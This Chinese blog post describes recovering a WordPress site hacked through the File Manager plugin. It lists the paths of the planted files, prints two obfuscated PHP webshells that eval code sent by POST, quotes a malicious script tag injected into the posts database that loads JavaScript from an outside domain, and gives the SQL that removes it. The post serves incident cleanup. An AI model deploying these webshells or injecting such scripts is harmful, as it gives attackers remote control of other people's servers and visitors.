共计 1625 个字符,预计需要花费 5 分钟才能阅读完成。
本站之前安装了file manager 插件,但是今天上来看的时候发现网站已经莫名其妙的跳转到一个神奇的网址,主要表现为首页跳转,文章页跳转,后台跳转,立马想到是被入侵了,进行了修复工作,首先大部分目录的文件被恶意的代码,为了防止有漏网之鱼,建议除了upload外重装wordpress,
实例文件如下:/www/wwwroot/wp-includes/xrtzthcvnj.php.suspected
/wp-content/uploads/image/.e75e7242.ico
/indexbak.php
/wp-includes/css/wp-config.php
/wp-content/plugins/qbgsulu/index.php.suspected
/wp-content/plugins/wp-file-manager/lib/files/n.php
/wp-content/plugins/wp-file-manager/lib/files/x.php
/wp-content/cpl.php
/zoljsqekub.php.suspected
<?php
goto WZ; Zr: $y9 = "\x63\162\145\x61\x74\145\137" . "\146\165\156\143\x74\151\x6f\x6e"; goto l0; q8: exit; goto iT; l0: $X4 = "\142\x61\x73\145\x36\64\x5f" . "\144\x65\143\x6f\x64\145"; goto Dc; WZ: if (!($_GET["\161"] == "\x31")) { goto UC; } goto ge; iT: UC: goto Zr; ge: echo "\x32\60\x30"; goto q8; Dc: register_shutdown_function($y9('', $X4($_POST["\146\x61\143\153"]))); goto NF; NF: echo "\40\xd\12\xd\12";
<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>
大部分为随机名字然后进去查看代码里面是乱码,阿里云盾判断为webshell后门病毒,首先删除上述及其他类似文件,
黑客还在MYSQL的文章表中wp_content的post_content中插入如下JS代码,导致及时删除上上述文件后,文章依然跳转到该网址
修复代码如下:
UPDATE wp_posts SET post_content = REPLACE(post_content, '<script src=\'https://temp.lowerbeforwarden.ml/temp.js?n=ns1\' type=\'text/javascript\'></script>', '')
在MYSQL中运行,替换
<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script
这一段代码,由此修复基本完成!
记得清理浏览器缓存防止依然后跳转造成误判
